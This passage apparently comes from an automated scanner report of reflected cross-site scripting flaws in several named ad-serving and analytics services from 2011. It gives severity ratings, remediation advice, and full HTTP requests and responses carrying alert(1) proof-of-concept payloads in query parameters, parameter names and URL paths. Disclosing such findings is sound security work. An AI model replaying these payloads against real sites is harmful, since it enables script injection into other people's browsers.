P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 499
Date: Tue, 04 Oct 2011 20:31:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Thu, 03-Nov-2011 20:31:20 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros40e0a'-alert(1)-'c3c00823c89;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.12. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5933'-alert(1)-'29310fe19c2 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;ord=0.7794340003747493?a5933'-alert(1)-'29310fe19c2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 500
Date: Tue, 04 Oct 2011 20:31:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3Ef21df86b6735b16d3c8e0c77; domain=collective-media.net; path=/; expires=Thu, 03-Nov-2011 20:31:17 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493?a5933'-alert(1)-'29310fe19c2;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.13. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2802'-alert(1)-'301e4287ccb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;ord=0.7794340003747493?&d2802'-alert(1)-'301e4287ccb=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 503
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:31:18 GMT
Connection: close
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Thu, 03-Nov-2011 20:31:18 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493?&d2802'-alert(1)-'301e4287ccb=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.14. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce765'-alert(1)-'db9b9346edb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjce765'-alert(1)-'db9b9346edb/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;env=ifr;ord1=431781;cmpgurl=http%253A//www.news.com.au/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:31:20 GMT
Content-Length: 7418
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122f463e720f79d';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30509189363_1317760280","http://ad.doubleclick.net/adjce765'-alert(1)-'db9b9346edb/iblocal.3interactive.ron/n7061_728ros;net=iblocal;u=,iblocal-30509189363_1317760280,122f463e720f79d,polit,;;kw=n7061_728ros;sz=728x90;net=iblocal;env=ifr;ord1=431781;cmw=nowl;contx=polit;dc=s;btg=;ord
...[SNIP]...

1.15. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5a58'-alert(1)-'906117d89cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.3interactive.ronf5a58'-alert(1)-'906117d89cf/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;env=ifr;ord1=431781;cmpgurl=http%253A//www.news.com.au/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7418
Date: Tue, 04 Oct 2011 20:31:20 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122f463e720f79d';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30123908496_1317760280","http://ad.doubleclick.net/adj/iblocal.3interactive.ronf5a58'-alert(1)-'906117d89cf/n7061_728ros;net=iblocal;u=,iblocal-30123908496_1317760280,122f463e720f79d,polit,;;kw=n7061_728ros;sz=728x90;net=iblocal;env=ifr;ord1=431781;cmw=nowl;contx=polit;dc=s;btg=;ord=0.7794340003747493?","72
...[SNIP]...

1.16. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c1bc'-alert(1)-'28be1efec48 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.3interactive.ron/n7061_728ros8c1bc'-alert(1)-'28be1efec48;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;env=ifr;ord1=431781;cmpgurl=http%253A//www.news.com.au/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7418
Date: Tue, 04 Oct 2011 20:31:21 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122f463e720f79d';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30107475256_1317760281","http://ad.doubleclick.net/adj/iblocal.3interactive.ron/n7061_728ros8c1bc'-alert(1)-'28be1efec48;net=iblocal;u=,iblocal-30107475256_1317760281,122f463e720f79d,polit,;;kw=n7061_728ros;sz=728x90;net=iblocal;env=ifr;ord1=431781;cmw=nowl;contx=polit;dc=s;btg=;ord=0.7794340003747493?","728","90",true)
...[SNIP]...

1.17. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ca2a'-alert(1)-'14d508e3d65 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.3interactive.ron/n7061_728ros;kw=4ca2a'-alert(1)-'14d508e3d65 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:31:17 GMT
Content-Length: 7336
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122f463e720f79d';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
iveMedia.createAndAttachAd("iblocal-30206994978_1317760277","http://ad.doubleclick.net/adj/iblocal.3interactive.ron/n7061_728ros;net=iblocal;u=,iblocal-30206994978_1317760277,122f463e720f79d,none,;;kw=4ca2a'-alert(1)-'14d508e3d65;cmw=nurl;contx=none;dc=s;btg=?","0","0",true);</scr'+'ipt>
...[SNIP]...

1.18. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72afb"-alert(1)-"c9cbad768b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?pfm=1&tent=ch&tnws=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=0&uatRandNo=74877&ad_type=ad&section=1782249&ad_size=728x90&72afb"-alert(1)-"c9cbad768b4=1 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.carsguide.com.au/search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 20:31:15 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 04 Oct 2011 20:31:15 GMT
Pragma: no-cache
Age: 0
Proxy-Connection: keep-alive
Content-Length: 4405

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?72afb"-alert(1)-"c9cbad768b4=1&Z=728x90&atf=0&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782249&tent=ch&tnws=ch&uatRandNo=74877&_salt=2562200122";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!windo
...[SNIP]...

1.19. http://adsfac.eu/ag.asp [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.eu
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload a7f40<script>alert(1)</script>432b200b5ff was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=a7f40<script>alert(1)</script>432b200b5ff&source=js&ord=[timestamp] HTTP/1.1
Host: adsfac.eu
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.milkround.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UserID=610040839265718; FSCIT00728473=uid=104893036; FSCIT007=pctl=28473&pctm=1&fpt=0%2C28473%2C&pct%5Fdate=4294&FL28473=1&FM149947=1&pctc=149947&FQ=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Tue, 04 Oct 2011 20:09:27 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSa7f40%3Cscript%3Ealert%281%29%3C%2Fscript%3E432b200b5ff0=uid=107239383; expires=Wed, 05-Oct-2011 20:10:26 GMT; domain=.adsfac.eu; path=/
Set-Cookie: FSa7f40%3Cscript%3Ealert%281%29%3C%2Fscript%3E432b200b5ff=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4294&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Fri, 04-Nov-2011 21:10:26 GMT; domain=.adsfac.eu; path=/
Set-Cookie: UserID=610040839265718aa8cb77f64554de065e9d97d; expires=Fri, 04-Nov-2011 21:10:26 GMT; domain=.adsfac.eu; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Tue, 04 Oct 2011 20:10:27 GMT

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://adsfac.eu/link.asp?cc=a7f40<script>alert(1)</script>432b200b5ff.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

1.20. http://adsfac.net/ag.asp [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.net
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 1b425<script>alert(1)</script>926cd7da7c3 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=1b425<script>alert(1)</script>926cd7da7c3&source=js&ord=920717113 HTTP/1.1
Host: adsfac.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://view.atdmt.com/2D1/iview/289812590/direct;wi.300;hi.250/01/4264749?click=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3b96/3/0/%2a/l%3B246942787%3B0-0%3B0%3B30941364%3B4307-300/250%3B41115319/41133106/1%3B%3B%7Eokv%3D%3Bsec1%3Dhome%3Barea%3Dhome%3Btile%3D4%3Bpos%3D1%3Bsz%3D300x250%2C300x600%3Bkw%3Dfox+sports%2Cfox+sports+videos%2Cfox+sports+news%2Cfoxsports+au%2Cfox+news+sports%2Cfox+sports+online%2Cfox+sports+au%2Cwatch+fox+sports+online%2Cafl%2Cnrl%2Crugby+league%2Cstate+of+origin%2Crugby%2Crugby+union%2Cwallabies%2Cfootball%2Csoccer%2Ca-league%2Cepl%2Csocceroos%2Ccricket%2Cmotor+sport%2Ctennis%2Cgolf+%3B%7Esscs%3D%3f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSHOM032=fpt=0%2C150687%2C&pct%5Fdate=4273&pctl=150687&FL150687=1&pctm=1&FM216892=1&pctc=216892&FQ=1; FSUBA007=fpt=0%2C69739%2C&gid=7660725445&STT=compare%2520savings%2520accounts%2520rates&pctm=1&pctcrt=1&pctl=69739&FL69739=1&xid=SnZCogZMH%5F7660725445&FM143325=1&pctc=143325&pdc=4290&FQ=1; FSDDA024=fpt=0%2C69739%2C&gid=8339786469&STT=bank%2520account%2520high%2520interest&pctm=1&pctcrt=1&FL69739=1&pctl=69739&FM153167=1&pctc=153167&pdc=4290&FQ=1; FSATR071=pctm=2&FL154149=2&pctc=221544&FQ=2&pctl=154149&FM221544=2&fpt=0%2C154149%2C&pct%5Fdate=4295; FSATR071154149=uid=7011717; FSGEP009145951=uid=7339671; FSGEP009=pctl=145951&fpt=0%2C145951%2C&pct%5Fdate=4295&pctm=1&FL145951=1&FM222647=1&pctc=222647&FQ=1; UserID=991308392614943

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 20:31:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Pragma: no-cache
Content-Length: 301
Content-Type: text/html
Expires: Tue, 04 Oct 2011 20:30:06 GMT
Set-Cookie: FS1b425%3Cscript%3Ealert%281%29%3C%2Fscript%3E926cd7da7c30=uid=9588089; expires=Wed, 05-Oct-2011 20:31:06 GMT; domain=.adsfac.net; path=/
Set-Cookie: FS1b425%3Cscript%3Ealert%281%29%3C%2Fscript%3E926cd7da7c3=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4295&pctm=1&FM665=1&pctc=665&FL0=1&FQ=1; expires=Fri, 04-Nov-2011 20:31:06 GMT; domain=.adsfac.net; path=/
Set-Cookie: UserID=99130839261494330b3e791efde65d3500815c7; expires=Fri, 04-Nov-2011 20:31:06 GMT; domain=.adsfac.net; path=/
Cache-control: private

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://adsfac.net/link.asp?cc=1b425<script>alert(1)</script>926cd7da7c3.0.0&CreativeID=665';}document.write('<a href="'+fd_clk+'&CreativeID=665" target="_blank">
...[SNIP]...

1.21. http://api.echoenabled.com/api/v1/search [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /api/v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 8ed8c<a>f98f7f6b4df was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /api/v1/search?q=childrenof%3Ahttp%3A%2F%2Fwww.thedailybeast.com%2Farticles%2F2011%2F10%2F04%2Fthe-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html+-source%3ATwitter+-state%3AModeratorDeleted%2CModeratorFlagged%2CSystemFlagged+-user.state%3AModeratorBanned+children%3A1+-source%3ATwitter+-state%3AModeratorDeleted%2CModeratorFlagged%2CSystemFlagged+-user.state%3AModeratorBanned+8ed8c<a>f98f7f6b4df&appkey=prod.newsweek.com&callback=jQuery16200750702265650034_1317758935251 HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/articles/2011/10/04/the-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html?cid=askmentrade
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Tue, 04 Oct 2011 20:30:44 GMT
Content-Length: 161
Content-Type: application/x-javascript; charset="utf-8"

jQuery16200750702265650034_1317758935251({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"8ed8c<a>f98f7f6b4df\" at 361" });

1.22. http://api.echoenabled.com/v1/search [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 8c9fc<a>67f44da5a47 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jQuery16200750702265650034_1317758935242&q=childrenof%3Ahttp%3A%2F%2Fwww.thedailybeast.com%2Farticles%2F2011%2F10%2F04%2Fthe-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html+-source%3ATwitter+-state%3AModeratorDeleted%2CModeratorFlagged%2CSystemFlagged+-user.state%3AModeratorBanned+children%3A1+-source%3ATwitter+-state%3AModeratorDeleted%2CModeratorFlagged%2CSystemFlagged+-user.state%3AModeratorBanned+8c9fc<a>67f44da5a47&appkey=prod.newsweek.com&_=1317758951074 HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/articles/2011/10/04/the-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html?cid=askmentrade
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Tue, 04 Oct 2011 20:17:56 GMT
Content-Length: 161
Content-Type: application/x-javascript; charset="utf-8"

jQuery16200750702265650034_1317758935242({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"8c9fc<a>67f44da5a47\" at 361" });

1.23. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 49210<script>alert(1)</script>90075246625 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=349210<script>alert(1)</script>90075246625&c2=7117341&c3=5797640&c4=44103179&c5=70503637&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
